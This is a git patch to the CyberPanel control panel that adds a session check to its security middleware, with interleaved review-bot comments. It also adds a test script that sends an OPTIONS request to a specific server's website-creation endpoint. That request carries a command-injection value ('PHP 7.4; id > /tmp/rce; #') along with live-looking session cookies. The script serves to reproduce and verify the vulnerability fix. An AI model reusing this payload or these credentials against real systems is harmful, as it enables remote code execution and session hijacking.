From 793b04364ac28382f99f5194f4ede7b525e24f53 Mon Sep 17 00:00:00 2001 From: usmannasir Date: Fri, 1 Nov 2024 10:58:02 +0400 Subject: [PATCH] added global session detector for further security --- CyberCP/secMiddleware.py | 63 +++++++++++++++++++++++++++------------- api/views.py | 1 - plogical/test.py | 39 +++++++++++++++++++++++++ 3 files changed, 82 insertions(+), 21 deletions(-) diff --git a/CyberCP/secMiddleware.py b/CyberCP/secMiddleware.py index d0fc778d7..0b66c6ed1 100755 --- a/CyberCP/secMiddleware.py +++ b/CyberCP/secMiddleware.py @@ -22,6 +22,45 @@ def __init__(self, get_response): self.get_response = get_response def __call__(self, request): + + ###### + + from plogical.processUtilities import ProcessUtilities + FinalURL = request.build_absolute_uri().split('?')[0] + + from urllib.parse import urlparse + pathActual = urlparse(FinalURL).path + + if os.path.exists(ProcessUtilities.debugPath): + logging.writeToFile(f'Path vs the final url : {pathActual}') + logging.writeToFile(FinalURL) + + if pathActual == '/' or pathActual == '/verifyLogin' or pathActual == '/logout' or pathActual.startswith('/api')\ + or pathActual.endswith('/webhook') or pathActual.startswith('/cloudAPI') or pathActual.endswith('/gitNotify'): + pass + else: + try: + val = request.session['userID'] + except: + if bool(request.body): + final_dic = { + 'error_message': "This request need session.", + "errorMessage": "This request need session."} + final_json = json.dumps(final_dic) + return HttpResponse(final_json) + else: + from django.shortcuts import redirect + from loginSystem.views import loadLoginPage + return redirect(loadLoginPage) + + # if os.path.exists(ProcessUtilities.debugPath): + # logging.writeToFile(f'Final actual URL without QS {FinalURL}') + + if os.path.exists(ProcessUtilities.debugPath): + logging.writeToFile(f'Request method {request.method.lower()}') + + ########################## + try: uID = request.session['userID'] admin = Administrator.objects.get(pk=uID) 
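Review bot: The allow-list that bypasses the new session check matches by prefix and suffix (`pathActual.startswith('/api')`, `pathActual.startswith('/cloudAPI')`, `.endswith('/webhook')`, `.endswith('/gitNotify')`), so any other route that merely starts with `/api` (no trailing slash) or ends in `/webhook` is exempted as well; tightening to `startswith('/api/')` and to the exact unauthenticated routes, or resolving the request to its URL name, keeps the exemption as narrow as intended. The bare `except:` around `request.session['userID']` should be `except KeyError:` so that only a missing session triggers the rejection and a session-backend failure still surfaces instead of being answered with a login redirect. The JSON rejection is returned with HTTP 200; `return HttpResponse(final_json, status=401, content_type='application/json')` lets clients and proxies treat it as an authentication failure, assuming the frontend does not depend on the 200. `pathActual` could simply be `request.path`, which avoids building and re-parsing the absolute URI. `__call__` continues past the end of this hunk.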
@@ -53,26 +92,7 @@ def __call__(self, request): except: pass - from plogical.processUtilities import ProcessUtilities - FinalURL = request.build_absolute_uri().split('?')[0] - - if os.path.exists(ProcessUtilities.debugPath): - logging.writeToFile(request.build_absolute_uri()) - logging.writeToFile(FinalURL) - - - if FinalURL == '/' or FinalURL == '/verifyLogin' or FinalURL == '/logout': - if os.path.exists(ProcessUtilities.debugPath): - logging.writeToFile(request.build_absolute_uri()) - - - # if os.path.exists(ProcessUtilities.debugPath): - # logging.writeToFile(f'Final actual URL without QS {FinalURL}') - - if os.path.exists(ProcessUtilities.debugPath): - logging.writeToFile(f'Request method {request.method.lower()}') - - if request.method.lower() == 'post' or request.method.lower() == 'options': + if bool(request.body): try: # logging.writeToFile(request.body) @@ -154,6 +174,9 @@ def __call__(self, request): logging.writeToFile(str(msg)) response = self.get_response(request) return response + else: + if os.path.exists(ProcessUtilities.debugPath): + logging.writeToFile('Request does not have a body.') # else: # try: # if request.path.find('cloudAPI/') > -1 or request.path.find('api/') > -1: diff --git a/api/views.py b/api/views.py index 342ca642d..0c12c1e56 100755 --- a/api/views.py +++ b/api/views.py @@ -92,7 +92,6 @@ def getPackagesListAPI(request): json_data = json.dumps(data_ret) return HttpResponse(json_data) - @csrf_exempt def getUserInfo(request): try: diff --git a/plogical/test.py b/plogical/test.py index e69de29bb..89f36eee9 100644 --- a/plogical/test.py +++ b/plogical/test.py 
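Review bot: Replacing the `post`/`options` method test with `if bool(request.body):` changes which requests reach the body-inspection block: a POST or OPTIONS with an empty body now skips it, while every other method that carries a body enters it. Accessing `request.body` here also buffers the whole payload in memory (multipart uploads included, which Django would otherwise stream) and raises `RequestDataTooBig` for bodies above `DATA_UPLOAD_MAX_MEMORY_SIZE`, and that access sits outside the `try:` that follows it. If the intent is to inspect every request that can carry data, keeping both tests, `if request.method.lower() in ('post', 'options') or bool(request.body):`, preserves the previous coverage; the same `bool(request.body)` access appears in the first hunk of this file and has the same memory cost. `__call__` begins and ends outside this hunk.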
@@ -0,0 +1,39 @@
+import requests
+
+url = "https://95.217.125.210:8090/websites/submitWebsiteCreation"
+headers = {
+ "Host": "95.217.125.210:8090",
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
+ "Accept-Language": "en-US,en;q=0.5",
+ "Accept-Encoding": "gzip, deflate, br, zstd",
+ "Referer": "https://95.217.125.210:8090/",
+ "Connection": "keep-alive",
+ "Cookie": "csrftoken=yWFDXndgjcsNYj7z8IYozbCQUBj4eLjXsG14u1PQay1lrwohlnqLHG5fwTuRC8I0; smtoken=7c09dd03817bdfebcaf0a97be32628c480663479; django_language=en; SignonSession=422tgvnrnd2f97lem1e2q0l76l; AIOHTTP_SESSION=\"gAAAAABnG8rXm2L1JmWTEqI8BGKHlWUvCQLuvN_VXWu-6r25Rk811sSjtcEK1-kuE-TrQTOwmN2K2xianVlqB3d70QcTeuQwH6a8yRfpi1UMDlysd8W10Xk8h4I_H77EFhZ01d05GImBipmznQIrQ54ZUBWt7ygx8JW52DYaG94Rd9slB3CZqpc=\"; sessionid=tsiqhd7qkcqh393qkdy7oteiagb046sl",
+ "Upgrade-Insecure-Requests": "1",
+ "Sec-Fetch-Dest": "document",
+ "Sec-Fetch-Mode": "navigate",
+ "Sec-Fetch-Site": "same-origin",
+ "Sec-Fetch-User": "?1",
+ "Priority": "u=0, i",
+ "Pragma": "no-cache",
+ "Cache-Control": "no-cache"
+}
+
+data = {
+ "package": "Default",
+ "domainName": "cyberpanel.net",
+ "ownerEmail": "cyber@gmail.com",
+ "phpSelection": "PHP 7.4; id > /tmp/rce; #",
+ "ssl": "on",
+ "websiteOwner": "admin",
+ "dkimCheck": "0",
+ "openBasedir": "on",
+ "mailDomain": "0",
+ "apacheBackend": "0"
+}
+
+response = requests.options(url, headers=headers, json=data, verify=False)
+
+print(response.status_code)
+print(response.text)
\ No newline at end of file
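Review bot: `plogical/test.py` commits a live session to the repository: the `Cookie` header carries real `csrftoken`, `sessionid`, `smtoken`, `SignonSession` and `AIOHTTP_SESSION` values for a specific host, and git history retains them even if the file is deleted later, so those sessions should be invalidated and the values replaced with placeholders read from the environment (for example `os.environ["CP_TEST_COOKIE"]`). The script also passes `verify=False`, which disables TLS certificate verification, and depends on `requests`, which nothing else in this patch imports, so it belongs under a test or tools directory rather than inside the `plogical` package, with a module docstring stating that it is a manual reproducer for the session check rather than part of the application. Because the request is issued at module level, `import plogical.test` would send it; wrapping the `requests.options(...)` call and the two `print` lines in `if __name__ == "__main__":` avoids that.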